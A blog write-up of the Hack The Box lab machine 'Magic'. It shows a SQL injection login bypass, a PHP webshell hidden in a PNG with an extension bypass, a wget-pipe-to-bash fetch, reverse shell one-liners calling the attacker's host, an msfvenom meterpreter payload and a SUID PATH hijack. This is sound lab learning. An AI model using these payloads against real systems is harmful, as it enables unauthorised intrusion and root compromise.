Home Magic - Hack The Box
Post
Cancel

Magic - Hack The Box

Posted Aug 22, 2020
Preview Image
By Ankit Kanojiya
4 min read

Magic starts with a classic PHP insecure upload vulnerability that let us place a webshell on the target host and then we exploit a subtle webserver misconfiguration to execute the webshell (even though the file name doesnโ€™t end with a .php extension). Once we land a shell, we escalate to another user with credentials found in MySQL and priv esc to root by exploiting a path hijack vulnerability in a SUID binary.

Summary

  • Bypass the login page with a simple SQL injection
  • Upload a PHP webshell after bypassing the file type and extension restriction
  • Find DB credentials, then find the password for user theseus in the MySQL database
  • Privesc by hijacking the PATH of a SUID binary

Portscan

Website and initial shell

The website is just an image gallery with a link to upload new images at the bottom.

The upload page is protected by a login form for which we donโ€™t have valid credentials.

We can try some default credentials like admin / admin on the login page but they donโ€™t work. Next weโ€™ll try a very simple SQL injection like ' or '1'='1 in the password field. This makes the password condition return True and weโ€™re able to pass the authentication check.

The application filters out what we can upload so weโ€™re not able to upload a PHP webshell with the .php extension.

The application also checks the content of the file so even if we rename the file to a valid image extension it fails the upload check.

By using a valid PNG image and inserting PHP code in the middle of the file we can pass the magic bytes check and the application will think itโ€™s a valid image.

To bypass the extension check, we can append .png and it will still execute the file as PHP code when we send the GET request to /images/uploads/snow.php.png. This happens because of a subtle misconfiguration in the htaccess configuration file. The regular expression only checks if the .php string is present in the filename, not that the file name actually ends with .php.

1
2
3
4
5
6

<FilesMatch ".+\.ph(p([3457s]|\-s)?|t|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
<Files ~ "\.(sh|sql)">
   order deny,allow
   deny from all

Now that we have uploaded the webshell we have remote code execution:

With the PHP webshell, I can fetch a bash script from my box and get a reverse shell through Perl:

http://magic.htb/images/uploads/snow.php.png?c=wget%20-O%20-%20http://10.10.14.35/shell.sh%20|%20bash

The bash script will try various methods to get a reverse shell back to us:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

if command -v python > /dev/null 2>&1; then
        python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.35",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
        exit;
fi

if command -v perl > /dev/null 2>&1; then
        perl -e 'use Socket;$i="10.10.14.35";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
        exit;
fi

if command -v nc > /dev/null 2>&1; then
        rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.35 443 >/tmp/f
        exit;
fi

if command -v sh > /dev/null 2>&1; then
        /bin/sh -i >& /dev/tcp/10.10.14.35/443 0>&1
        exit;
fi

Privesc to user theseus

In the web application directory /var/www/Magic, we find a PHP script db.php5 that contains the database configuration file for the web application with the mysql username, password and database name.

1
2
3
4
5
6
7

<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

The mysql CLI client isnโ€™t installed on the machine so weโ€™ll have to do port forwarding to reach port 3306 listening on localhost. Thereโ€™s many ways to do this, here Iโ€™ll use a meterpreter shell to port forward 3306.

msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o met LHOST=10.10.14.35 LPORT=5555

We can now log in to MySQL and we find another password in the login table.

We can use the Th3s3usW4sK1ng to su to user theseus:

Privesc to root

Looking at SUID files, /bin/sysinfo stands out because itโ€™s not a standard Linux binary.

The program just seems to be running a bunch of standard Linux programs like free.

By using ltrace, we can confirm this and see that the program uses the popen function to execute programs:

The program is vulnerable because we control the PATH and the program doesnโ€™t use the absolute path to execute the programs so we can execute anything we want as root. To get root Iโ€™ll just create a script that sets the SUID bit on /bin/bash, name it free and call /bin/sysinfo after setting the path to my current directory so it doesnโ€™t execute the real free program but my own script.

hackthebox, infosec
sqli upload php mysql port forward suid path hijack
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents